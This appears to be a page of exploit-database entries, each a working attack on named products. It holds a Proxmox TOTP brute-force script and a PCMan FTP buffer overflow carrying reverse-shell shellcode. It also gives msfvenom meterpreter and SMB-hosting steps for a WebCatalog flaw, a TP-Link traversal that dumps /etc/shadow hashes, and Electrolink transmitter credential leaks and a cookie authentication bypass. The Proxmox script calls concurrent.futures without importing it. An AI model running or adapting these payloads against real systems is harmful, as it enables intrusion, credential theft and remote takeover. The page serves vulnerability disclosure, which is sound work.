-
Proxmox VE - TOTP Brute Force
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320
#
# NOTE(review): proof-of-concept accompanying the advisory above. Given an
# already-known username/password it walks the whole six-digit TOTP space
# against the ticket endpoint. That is only feasible if the service does not
# throttle or lock out repeated second-factor attempts, which is the
# advisory's premise and is not verifiable from this script alone.
# Defender notes: the observable signature is a sustained burst of POSTs to
# /api2/extjs/access/ticket carrying a "tfa-challenge" form field, from one
# source, for one account. Alerting on repeated TFA failures per account and
# upgrading beyond the listed version range are the mitigations.

import time
import requests
import urllib.parse
import json
import os
import urllib3
urllib3.disable_warnings()  # every request below uses verify=False, so TLS warnings are silenced

threads=25

#################### REPLACE THESE VALUES #########################
password="KNOWN PASSWORD HERE"
username="KNOWN USERNAME HERE"
target_url="https://HOST:PORT"
##################################################################

# Module-level state shared between refresh_ticket() and attack().
ticket=""
ticket_username=""
CSRFPreventionToken=""
ticket_data={}
auto_refresh_time = 20 # in minutes - 30 minutes before expiration
last_refresh_time = 0
# Candidate list: every zero-padded six-digit string, "000000".."999999".
tokens = [];
for num in range(0,1000000):
    tokens.append(str(num).zfill(6))

def refresh_ticket(target_url, username, password):
    # Obtain a fresh first-factor ticket plus CSRF token with the known
    # credentials. The response body is URL-decoded before JSON parsing.
    # Side effects: rewrites the CSRFPreventionToken, ticket_username and
    # ticket_data globals that attack() reads.
    global CSRFPreventionToken
    global ticket_username
    global ticket_data
    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"
    refresh_ticket_cookies = {}
    refresh_ticket_headers = {}
    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)
    ticket_data = json.loads(ticket_data_raw)
    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]
    ticket_username = ticket_data["data"]["username"]

def attack(token):
    # One TOTP guess, executed from a worker thread.
    # token: six-digit candidate string.
    # Re-issues the ticket once auto_refresh_time minutes have passed since
    # the last refresh; the global update is not synchronised across threads.
    global last_refresh_time
    global auto_refresh_time
    global target_url
    global username
    global password
    global ticket_username
    global ticket_data
    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
        refresh_ticket(target_url, username, password)
        last_refresh_time = int(time.time())
    url = target_url + "/api2/extjs/access/ticket"
    cookies = {}
    headers = {"Csrfpreventiontoken": CSRFPreventionToken}
    # Stage 1 strips the outer quotes from the JSON-encoded ticket string;
    # stage 2 swaps the colon after the escaped "totp"/"recovery" keys for
    # "%3A" before the value is sent as the tfa-challenge form field.
    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]
    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')
    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}
    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)
    # Success heuristic: a response body longer than 350 characters (no HTTP
    # status check). The whole process is then terminated from this thread.
    if(len(response.text) > 350):
        print(response.text)
        os._exit(1)

# Outer loop re-submits the full candidate list until os._exit() fires.
while(1):
    refresh_ticket(target_url, username, password)
    last_refresh_time = int(time.time())
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        res = [executor.submit(attack, token) for token in tokens]
        concurrent.futures.wait(res)
-
GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities # Date: 25/9/2023 # Exploit Author: Syed Affan Ahmed (ZEROXINN) # Vendor Homepage: https://www.embedthis.com/goahead/ # Affected Version: 2.5, possibly others. # Tested On Version: 2.5 in ZTE AC3630 ---------------------------POC--------------------------- GoAhead Web Server Version 2.5 is prone to multiple HTML-injection vulnerabilities due to inadequate input validation. HTML injection allows attacker-supplied markup to be rendered within the context of the site. http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>
-
RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC
RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC Vendor: Royal Apps GmbH Web page: https://www.royalapps.com Affected version: 6.0.1.1000 (macOS) Summary: Royal TS is an ideal tool for system engineers and other IT professionals who need remote access to systems with different protocols. Not only easy to use, it enables secure multi-user document sharing. Desc: The application receives SIGABRT after RAPortCheck.createNWConnection() function is handling the SecureGatewayHost object in the RoyalTSXNativeUI. When the hostname has an array of around 1600 bytes and Test Connection is clicked the app crashes instantly. Tested on: MacOS 13.5.1 (Ventura) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5788 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php 05.09.2023 -- ------------------------------------- Translated Report (Full Report Below) ------------------------------------- Process: RoyalTSX [23807] Path: /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX Identifier: com.lemonmojo.RoyalTSX.App Version: 6.0.1 (6.0.1.1000) Code Type: X86-64 (Native) Parent Process: launchd [1] User ID: 503 Date/Time: 2023-09-05 16:09:46.6361 +0200 OS Version: macOS 13.5.1 (22G90) Report Version: 12 Bridge OS Version: 7.6 (20P6072) Time Awake Since Boot: 21000 seconds Time Since Wake: 1106 seconds System Integrity Protection: enabled Crashed Thread: 0 tid_103 Dispatch queue: com.apple.main-thread Exception Type: EXC_BAD_ACCESS (SIGABRT) Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000050 Exception Codes: 0x0000000000000001, 0x0000000000000050 Termination Reason: Namespace SIGNAL, Code 6 Abort trap: 6 Terminating Process: RoyalTSX [23807] VM Region Info: 0x50 is not in any region. 
Bytes before following region: 140737488273328 REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL UNUSED SPACE AT START ---> shared memory 7ffffffec000-7ffffffed000 [ 4K] r-x/r-x SM=SHM Application Specific Information: abort() called Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x7ff809ef7202 __pthread_kill + 10 1 libsystem_pthread.dylib 0x7ff809f2eee6 pthread_kill + 263 2 libsystem_c.dylib 0x7ff809e55b45 abort + 123 3 libmonosgen-2.0.1.dylib 0x1028daa1b altstack_handle_and_restore + 235 4 libmonosgen-2.0.1.dylib 0x102879db6 summarize_frame_internal + 310 5 libmonosgen-2.0.1.dylib 0x102879f66 summarize_frame + 198 6 libmonosgen-2.0.1.dylib 0x10287578f mono_walk_stack_full + 1135 7 libmonosgen-2.0.1.dylib 0x102873944 mono_summarize_managed_stack + 100 8 libmonosgen-2.0.1.dylib 0x102a0f478 mono_threads_summarize_execute_internal + 1256 9 libmonosgen-2.0.1.dylib 0x102a0f8aa mono_threads_summarize + 346 10 libmonosgen-2.0.1.dylib 0x1028e0b67 mono_dump_native_crash_info + 855 11 libmonosgen-2.0.1.dylib 0x10287864e mono_handle_native_crash + 318 12 libmonosgen-2.0.1.dylib 0x1027d1966 mono_crashing_signal_handler + 86 13 libsystem_platform.dylib 0x7ff809f5c5ed _sigtramp + 29 14 ??? 0x101e9502c ??? 
15 RoyalTSXNativeUI 0x109e50012 RAPortCheck.createNWConnection() + 290 16 RoyalTSXNativeUI 0x109e4f6d2 RAPortCheck.connect() + 242 17 RoyalTSXNativeUI 0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592 18 RoyalTSXNativeUI 0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359 19 RoyalTSXNativeUI 0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51 20 AppKit 0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323 21 AppKit 0x7ff80d2972b0 -[NSControl sendAction:to:] + 86 22 AppKit 0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131 23 AppKit 0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171 24 AppKit 0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96 25 AppKit 0x7ff80d293ee5 NSControlTrackMouse + 1816 26 AppKit 0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121 27 AppKit 0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606 28 AppKit 0x7ff80d292ac0 -[NSControl mouseDown:] + 659 29 AppKit 0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330 30 AppKit 0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404 31 AppKit 0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345 32 AppKit 0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345 33 AppKit 0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360 34 AppKit 0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69 35 AppKit 0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78 36 AppKit 0x7ff80d33f773 _NSTryRunModal + 100 37 AppKit 0x7ff80d4c20be -[NSApplication runModalSession:] + 128 38 RoyalTSXNativeUI 0x109f17044 RAPropertiesWindowController._showModal() + 628 39 RoyalTSXNativeUI 0x109f17548 @objc RAPropertiesWindowController._showModal() + 24 40 Foundation 0x7ff80ae84951 
-[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379 41 Foundation 0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124 42 libffi.dylib 0x7ff81a5fd8c2 ffi_call_unix64 + 82 43 libffi.dylib 0x7ff81a5fd214 ffi_call_int + 830 Thread 0 crashed with X86 Thread State (64-bit): rax: 0x0000000000000000 rbx: 0x00007ff84d608700 rcx: 0x00007ff7be10fbc8 rdx: 0x0000000000000000 rdi: 0x0000000000000103 rsi: 0x0000000000000006 rbp: 0x00007ff7be10fbf0 rsp: 0x00007ff7be10fbc8 r8: 0x0000000000000212 r9: 0x00007fafaeaf64a8 r10: 0x0000000000000000 r11: 0x0000000000000246 r12: 0x0000000000000103 r13: 0x00007ff7be110418 r14: 0x0000000000000006 r15: 0x0000000000000016 rip: 0x00007ff809ef7202 rfl: 0x0000000000000246 cr2: 0x00007ff84d611068 Logical CPU: 0 Error Code: 0x02000148 Trap Number: 133 Thread 0 instruction stream: 0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d ..$...I.y.L.E..M d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3 .H.U.M...]y..H.. 4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07 K.|>.H.s0....... 7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0 .%.L.E.H.CXK..>. 00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00 ...A.D$.C..>.... 48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60 H.C8K..>....H.C` [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89 .@PC..>.....C@C. <== 84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00 .>....H.E.C..>.. 00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48 ...E.C..>......H 8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90 ....&......C..>. 00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83 .......I.E.H..A. 38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14 8.t$K.|>.M...i.. Binary Images: 0x101deb000 - 0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX ... ...
-
WebCatalog 48.4 - Arbitrary Protocol Execution
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution # Date: 9/27/2023 # Exploit Author: ItsSixtyN3in # Vendor Homepage: https://webcatalog.io/en/ # Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe # Version: 48.4.0 # Tested on: Windows # CVE : CVE-2023-42222 Vulnerability summary: WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery. Exploit details: - Create a reverse shell file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe - Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py) python3 smbserver.py Tools -smb2support - Have the user sync a page with the payload as a renamed link [Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title) Payload: search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title Tobias Diehl Security Consultant OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300 Pronouns: he/him e-mail: [email protected]
-
PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3
#
# NOTE(review): Python 2 source (print statements, str used as a byte
# buffer). The PoC sends an oversized argument to the FTP 'pwd' command:
# 2007 filler bytes, the return address from the author's notes below, a
# 32-byte NOP sled and the payload blob. The payload bytes are reproduced
# as published and were not regenerated here.
# Defender notes: the observable signature is an FTP command line of
# several kilobytes immediately after an anonymous login; this server
# release should not be reachable from untrusted networks.

#!/usr/bin/python
import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444

overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")

# Buffer layout: filler up to the saved return address (offset 2007 per the
# notes above), the overwrite value, a NOP sled, then the payload.
shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow

# Change IP/Port as required
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.146.135',21))
    data = s.recv(1024)
    s.send('USER anonymous' +'\r\n')
    data = s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.send('pwd ' + shellcode + '\r\n')
    s.close()
    print "\nExploit completed successfully!."
# Bare except: any failure in the block above (not only a refused
# connection) is reported with the same message.
except:
    print "Could not connect to FTP!"
-
TP-Link TL-WR740N - Unauthenticated Directory Traversal
# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal # Date: 25/9/2023 # Exploit Author: Syed Affan Ahmed (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ipaddr=192.168.0.100; mLangage=Âée; exception=4 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::
-
TP-LINK TL-WR740N - Multiple HTML Injection
# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities # Date: 25/9/2023 # Exploit Author: Shujaat Amin (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: Windows 10 ---------------------------POC----------------------------- 1) Go to your router's IP (192.168.0.1) 2) Go to Access control --> Target, rule 3) Click on add new 5) Type <h1>Hello<h1> in the Target Description box 6) Click on Save; the injected HTML is now rendered on the page
-
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. 
Digital deviation limiter together with ASI and SDI inputs is available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust design and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in login.htm and mail.htm, which can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-XXXX Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw" 55:<td class=cd31>Admin password</td> 56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td> 63:<td class=cd31>Guest password</td> 64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td> C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw" 93:<td class=cd31>Server password</td> 94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>
-
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. 
Digital deviation limiter together with ASI and SDI inputs is available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust design and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in controlloLogin.js, which can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5790 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js" function verifica() { var user = document.getElementById('user').value; var password = document.getElementById('password').value; //alert(user); if(user=='admin' && password=='cozzir'){ SetCookie('Login','OK',exp); window.location.replace("FrameSetCore.html"); }else{ SetCookie('Login','NO',exp); window.location.replace("login.html"); } }
-
Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass
Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. 
Digital deviation limiter together with ASI and SDI inputs is available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust design and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is vulnerable to an authentication bypass affecting the Login Cookie. An attacker can set the Login Cookie to any value other than 'NO' and gain full system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5791 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"
-
Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal
